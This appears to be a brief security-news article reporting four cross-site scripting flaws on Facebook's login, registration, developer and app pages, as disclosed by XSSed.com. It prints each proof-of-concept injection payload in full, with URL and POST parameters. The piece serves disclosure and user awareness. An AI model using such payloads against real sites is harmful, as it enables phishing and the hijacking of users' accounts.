Four Cross-scripting Vulnerabilities Found on Facebook Pose Serious Privacy Risk
XSSed.com reported today four flaws affecting Facebook’s developers page, login page and the new users registration page, potentially assisting malicious attackers make their spam and phishing campaigns look authentic. Cybercriminals could exploit these XSS flaws to infect Facebook users, both new and registered, with malware or spyware.
The flaws that affect Facebook components have already been reported. So far there were no known cases of active exploitation and Facebook is usually quick to react upon notification.
Latest Facebook XSS vulnerabilities as they are reported on XSSed:
XSS #1 with POST (by Zeitjak)
http://www.new.facebook.com/r.php
POST: reg_email__=”onmouseover=”alert(‘XSS – ZJ’)”foo=”bar
XSS #2 with POST (by David Wharton)
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
POST:
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C
%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=LoginXSS #3 (by DaiMon)
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.
XSS #4 with POST (by p3lo)
http://developers.facebook.com/tools.php?fbml
POST:
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle
%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo
%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Facebook users are advised not to accept friend invitations from strangers, not to follow Facebook links sent by email from unknown sources and report suspicious requests to Facebook security staff.
More on CyberInsecure:
Leave a Reply
Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.